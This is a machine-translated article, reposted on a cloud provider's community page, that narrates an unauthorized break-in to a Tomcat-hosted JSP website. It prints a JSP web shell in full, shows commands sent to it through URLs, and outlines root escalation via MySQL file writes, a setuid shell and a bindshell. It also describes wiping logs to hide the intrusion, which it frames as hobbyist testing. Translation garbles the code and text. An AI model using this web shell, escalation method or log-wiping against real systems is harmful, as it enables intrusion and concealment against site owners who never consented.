On-site documentary-how to intrude into JSP-based websites
Source: Internet
Author: User
By chance, when you browse a website, the page is fresh and comfortable. Websites are developed using JSP. For my personal interests, I decided to test the security of my system.
It seems that the security status is good. Let's take a deeper test. Tomcat 3.1 comes with a management tool that allows you to view directories and files on the web and add context. So try:
Http: // destination: 8080/admin/
The Administrator did not delete or prohibit access to this directory. In terms of security, this is a very important mistake.
Next, click the "view all context" button to list the names of some files and directories under the web directory, and a component for uploading files will soon be found, use this component to upload a JSP file to the target web directory:
The password is displayed. The next step is to guess the password and fail. However, now it is equivalent to having a shell. If you cannot guess the password, you can use IE as the shell environment first.
Write another JSP file:
<% @ Page import = "Java. Io. *" %> 〉
<%
Try {
String cmd = request. getparameter ("cmd ");
Process child = runtime.getruntime(cmd.exe C (CMD );
Inputstream in = Child. getinputstream ();
Int C;
While (C = in. Read ())! =-1 ){
Out. Print (char) C );
}
In. Close ();
Try {
Child. waitfor ();
} Catch (interruptedexception e ){
E. printstacktrace ();
}
} Catch (ioexception e ){
System. Err. println (E );
}
%> 〉
Then upload the JSP file through upload, and there is a shell.
Http: // target: 8080/upload/CMD. jsp? Cmd = LS +-La +/
(Detailed results are not listed here)
How can I obtain the root permission? After some searches, it is found that MySQL is installed in the system and the MySQL password is obtained from the JSP Source Code. Run:
The system runs MYSQL as the root user. Now I thought about it. Now that I know the MySQL password, I can write a shell program to create a table and put my data in the table, then use "select... into OUTFILE; "to create a file on the system, allowing the user to run my program while executing the Su. (Do you still remember that apache.org was intruded? This method is used by hackers ).
After that, it is relatively simple to upload a program such as bindshell, run the program, and obtain the nobody permission. You can use the setuid shell created by Su root to make yourself a root user.
However, the following operations have taken place, and the results are quite surprising:
Originally, this web shell was root! How does the Administrator perform security settings?
Http: // target: 8080/upload/CMD. jsp? Cmd = Ps + Aux
It was run as root (not listed)
The rest:
1. delete my Telnet records.
2. Delete HTTP logs.
To clear logs, I used cat XXX | grep-V "ip"> temp to overwrite the modified log files.
Note that I did not change the page of the website because I am just a network security enthusiast. So, send an email to system admin! Of course, by the way, I mentioned in my letter that we would be very happy if it was needed to provide him with security services!
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.